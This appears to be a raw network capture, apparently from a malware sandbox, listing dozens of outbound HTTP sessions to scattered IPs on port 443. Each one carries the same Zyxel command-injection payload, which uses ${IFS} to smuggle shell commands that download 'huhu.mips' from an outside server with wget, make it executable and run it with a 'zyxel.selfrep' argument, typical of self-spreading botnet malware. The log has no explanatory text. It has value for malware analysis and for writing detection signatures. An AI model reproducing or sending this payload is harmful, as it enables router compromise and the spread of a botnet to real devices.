                                            Feb 2, 2024 06:20:23.155713081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            150192.168.2.1556698151.161.97.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155738115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            151192.168.2.1544812132.151.138.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155761957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            152192.168.2.1542222116.134.90.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155791998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            153192.168.2.1543402162.188.100.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155807018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            154192.168.2.1556446158.168.146.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155864000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            155192.168.2.155208445.66.37.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155878067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            156192.168.2.15609264.43.184.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155881882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            157192.168.2.154878864.138.243.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155930996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            158192.168.2.156055679.237.16.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155952930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            159192.168.2.1551918165.163.17.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155953884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            160192.168.2.155638077.29.206.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155972958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            161192.168.2.1557824135.226.110.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156002045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            162192.168.2.1541360188.23.33.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156035900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            163192.168.2.1560576107.176.222.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156060934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            164192.168.2.1545980186.35.64.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156086922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            165192.168.2.155811267.180.14.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156116962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            166192.168.2.1550060218.129.77.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156136036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            167192.168.2.153900437.221.101.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156164885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            168192.168.2.155604864.125.78.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156188965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            169192.168.2.154571273.102.180.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156212091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            170192.168.2.1552904103.159.95.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156698942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            171192.168.2.1546954117.206.67.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156725883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            172192.168.2.153404270.152.166.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156749010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            173192.168.2.1538390137.7.71.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156758070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            174192.168.2.155234069.166.254.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156801939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            175192.168.2.1552482116.0.37.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156806946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            176192.168.2.155524696.46.119.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156832933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            177192.168.2.1543560148.106.144.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156877041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            178192.168.2.1546522130.150.79.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156882048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            179192.168.2.155402891.41.79.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156919003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            180192.168.2.1548890207.203.212.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156935930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            181192.168.2.154785854.178.210.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156964064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            182192.168.2.1556574156.204.11.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156975985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            183192.168.2.1533016201.141.139.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.156996965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            184192.168.2.155888479.207.155.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157026052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            185192.168.2.1538792116.213.187.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157049894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            186192.168.2.1543704110.84.16.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157066107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            187192.168.2.1560250153.47.200.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157120943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            188192.168.2.1538264161.56.186.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157151937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            189192.168.2.1548612162.185.209.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157176018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            190192.168.2.1550214153.132.63.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157186985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            191192.168.2.1553742155.37.180.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157211065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            192192.168.2.153744860.115.120.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157241106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            193192.168.2.1543006160.84.178.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157263041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            194192.168.2.1559118208.18.254.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157275915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            195192.168.2.154207894.129.176.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157309055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            196192.168.2.155425043.159.194.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157325983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            197192.168.2.1553958115.30.46.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157371044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            198192.168.2.1539850119.186.72.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157392025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            199192.168.2.1544890205.93.163.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157414913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            200192.168.2.1557046188.242.92.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157438040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            201192.168.2.1554100177.173.153.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157474995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            202192.168.2.1559212102.60.93.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157502890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            203192.168.2.1540550217.175.29.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157526016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            204192.168.2.155907238.161.101.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157548904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            205192.168.2.1549030180.161.243.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157568932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            206192.168.2.155591690.214.222.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157602072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            207192.168.2.1540160118.240.10.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157629967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            208192.168.2.1552226182.120.200.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157654047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            209192.168.2.1536190149.170.109.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157676935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            210192.168.2.1550424179.171.160.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157701015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            211192.168.2.154854442.130.134.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157732010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            212192.168.2.1543064105.233.163.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157774925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            213192.168.2.1541658103.128.5.126443
                                            TimestampBytes transferredDirectionData
